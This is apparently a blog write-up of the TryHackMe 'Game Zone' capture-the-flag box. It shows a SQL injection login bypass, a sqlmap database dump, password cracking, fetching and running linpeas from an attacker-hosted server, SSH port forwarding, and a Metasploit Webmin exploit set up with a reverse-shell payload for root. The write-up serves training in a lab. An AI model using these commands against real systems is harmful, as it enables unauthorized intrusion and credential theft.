SQLi and Reverse SSH Tunnelling | Game Zone THM

CTF
ToxSec

SQLi and Reverse SSH Tunnelling | Game Zone THM

Game Zone, offered by TryHackMe, is a box that covers a broad spectrum of tasks. It takes participants through SQL injection, password cracking, reverse SSH tunneling, and the use of Metasploit. It’s a solid challenge, offering a good mix of content for those keen to hone their skills.

 

Insights

  • Web Application Vulnerabilities: SQL injection vulnerability was discovered and exploited in the login form. This emphasizes the importance of securing web applications, as they often present entry points for potential cyber-attacks.
  • Hash Extraction and Cracking: After obtaining a password hash, tools were used to identify its type and then crack it to retrieve the original credentials. This highlights the significance of strong password hashing mechanisms and the potential risks of weak password security.
  • Privilege Escalation Techniques: Using tools like LinPEAS helps in identifying potential paths to elevate privileges. It underscores the importance of system hardening and monitoring to prevent unauthorized escalations.

User Flag

I began with an aggressive scan focusing on the most prevalent ports using Nmap.

└─$ nmap -sC -sV -A 10.10.238.97 
Starting Nmap 7.93 ( https://nmap.org ) at 2023-10-21 15:56 EDT

The results highlighted that ports 22 and 80 were open for business. With an HTTP service actively running on port 80, the logical next step was to initiate directory discovery, and for that, I turned to gobuster.

└─$ gobuster dir --url http://10.10.238.97 --wordlist<span style="background-color:rgba(0, 0, 0, 0);color:#00ff00" class="has-inline-color"> </span>/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.238.97
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2021/08/29 18:00:33 Starting gobuster in directory enumeration mode
===============================================================

Following the scan initiation, I dove into some hands-on web application exploration. It didn’t take long before I found a login form located at the /index path.

POST /index.php HTTP/1.1
Host: 10.10.238.97
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 37
Origin: http://10.10.238.97
Connection: close
Referer: http://10.10.238.97/
Cookie: PHPSESSID=h4had2deibkvklgbt6ti1fhap1
Upgrade-Insecure-Requests: 1

username=Admin&password=Pass&x=27&y=3

SQL Injection

I decided to pass the form to Burpsuite and give the Intruder module a shot with an SQL wordlist. To my discovery, the username field seemed to be vulnerable to an SQL injection attack.

Log in: admin' OR 1=1 -- -
Password: pass

Diving Deeper with Burp Suite and SQLMap

I went back to Burp Suite to catch the web request once more and saved its contents to a file. With that in hand, I turned to SQLMap, hoping to pinpoint another potential injection point. In this case, it was /portal.php.

POST /portal.php HTTP/1.1

Host: 10.10.240.149
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 15
Origin: http://10.10.240.149
Connection: close
Referer: http://10.10.240.149/portal.php
Cookie: PHPSESSID=a1jugj0lqpq43du1e5tvrjlf85
Upgrade-Insecure-Requests: 1

searchitem=VULNERABLE

With the information at hand, I proceeded to execute the subsequent command, aiming to extract a hash from the password table.

└─$ sqlmap -r web_req 10.10.240.149 --dbms=mysql --dump

Identifying and Decoding the Hash

Next, I took the extracted hash and input it into tools like CyberChef or hashID. The goal? Determine the specific hashing algorithm employed.

With the type of hash in hand, JohnTheRipper became my tool of choice to decipher it and hopefully reveal some useful credentials.

john crackme --wordlist=/usr/share/wordlists/rockyou.txt --format=********

Using the discovered username and password, we can log into SSH and grab the first flag.

Root Flag

After looking through some files and trying the most common privesc techniques, I use linpeas to speed up the process.

LinPEAS

I sifted through various files and attempted some of the routine privesc methods without much luck. To expedite the process and potentially uncover overlooked paths, I turned to linpeas, a reliable tool known for its thoroughness in such scenarios.

    To get things rolling, I configured a local python3 HTTP server on the attacking machine. This would allow for easy file transfers and other interactions between the target and my system.

    └─$ python3 -m http.server 5555
Serving HTTP on 0.0.0.0 port 5555 (http://0.0.0.0:5555/) ...

    Following that, I employed wget to retrieve the file, targeting the /tmp directory. This directory is commonly used for such operations, as users typically have write permissions here, making it a go-to spot for temporary file storage and operations.

    user@gamezone:/tmp$ wget http://10.13.18.79:5555/linpeas
--2021-08-29 23:13:24--  http://10.13.18.79:5555/linpeas
Connecting to 10.13.18.79:5555... connected.
HTTP request sent, awaiting response... 200 OK
Length: 342868 (335K) [application/octet-stream]
Saving to: ‘linpeas’
linpeas                             100%[================================================================>] 334.83K   312KB/s    in 1.1s    
2021-08-29 23:13:25 (312 KB/s) - ‘linpeas’ saved [342868/342868]
user@gamezone:/tmp$ chmod +x linpeas 
user@gamezone:/tmp$ ./linpeas

    Make sure to enable execute permissions on the file before running it. One of the interesting finds here is a port on 10000 that is being run locally. To access this port with our web browser, we will need to establish a reverse SSH tunnel.

    Understanding the Reverse SSH Tunnel

    A reverse SSH tunnel, in essence, is a technique used to create an SSH link to an SSH server that’s behind a protective barrier like a firewall. What’s neat about it is that it lets you initiate a connection from your local machine right back to that distant computer. Think of it as a bridge, allowing you to communicate with remote systems even when direct access is limited.

    └─$ ssh -L 10000:127.0.0.1:10000 [email protected]

    Now, if we enter 127.0.0.1:10000 into the browser, we are directed to a new web page.

    It’s surprising, but credential reuse remains a prevalent issue. Sticking to the principle of “try the simplest thing first,” I used the credentials uncovered from our SSH exploration. And sure enough, upon entry, I was greeted with a page displaying the version number for Webmin. It’s a reminder that sometimes, keeping things straightforward can yield valuable results.

    Probing with searchsploit

    When I input the Webmin version into searchsploit, I stumbled upon a notable result—a Ruby file. From past encounters, I’ve come to recognize that such a file typically suggests a Metasploit module might be available for this specific vulnerability.

    └─$ searchsploit 1.580             
------------------------------------ ---------------------------------
 Exploit Title                      |  Path
------------------------------------ ---------------------------------
Webmin X.XXX - '/file/show.cgi' Rem | unix/remote/21851.rb
------------------------------------ ---------------------------------

    Once I fired up msfconsole, I tapped into its search functionality. Sure enough, the results confirmed the existence of a relevant module. This hinted at a potential avenue for exploitation using Metasploit’s capabilities.

    exploit/unix/webapp/webmin_show_cgi_exec

    The last step is to configure the module and run the exploit.

    Module options (exploit/unix/webapp/webmin_show_cgi_exec):
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD  xxxxxxxxxxxxxxx  yes       Webmin Password
   Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS    127.0.0.1        yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT     10000            yes       The target port (TCP)
   SSL       false            yes       Use SSL
   USERNAME  user             yes       Webmin Username
   VHOST                      no        HTTP server virtual host
Payload options (cmd/unix/reverse):
   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  tun1             yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

    Configuring for the Final Push

    To optimize our chances, it’s essential to adjust a few settings. Ensure you set SSL to false and point the RHOST to localhost — that’s where our SSH tunnel is anchored. For the payload, I found cmd/unix/reverse to be the most effective.

    Executing this will reward us with a root connection. And there, in the /root directory, awaits the flag we’ve been working towards.

    Game Zone Summary

    In the “Game Zone” challenge from TryHackMe, I was presented with a myriad of tasks to tackle, encompassing SQL injection, password cracking, reverse SSH tunneling, and Metasploit utilization.

     

    I started with an Nmap scan, which highlighted open ports 22 and 80. Intrigued by the HTTP service on port 80, I utilized gobuster for directory discovery. This led to the identification of a login form at the /index path.

     

    Upon testing, the login form’s username field proved vulnerable to SQL injection. With the aid of Burp Suite and the Intruder module, a successful injection was made. I further used SQLMap to target /portal.php, extracting a password hash in the process.

     

    Decoding the extracted hash identified its type, and with the help of JohnTheRipper, the original credentials were revealed. This facilitated SSH login, allowing me to retrieve the user flag.

     

    Linpeas was the tool of choice for potential privilege escalation paths. While using it, I noted a locally running port 10000. A reverse SSH tunnel was then established to communicate with this port. To my astonishment, the same SSH credentials permitted access to a new web page displaying the Webmin version.

     

    Using searchsploit, a vulnerability related to the discovered Webmin version was identified, hinting at a potential Metasploit module. Upon confirmation within the Metasploit framework, I configured the module accordingly. Successful exploitation using this module granted a root connection, and I was able to secure the coveted root flag.

     

    Game Zone was a compelling challenge, effectively blending various aspects of penetration testing. I commend TryHackMe for creating such a comprehensive learning experience.

    Related Posts

    Back To Top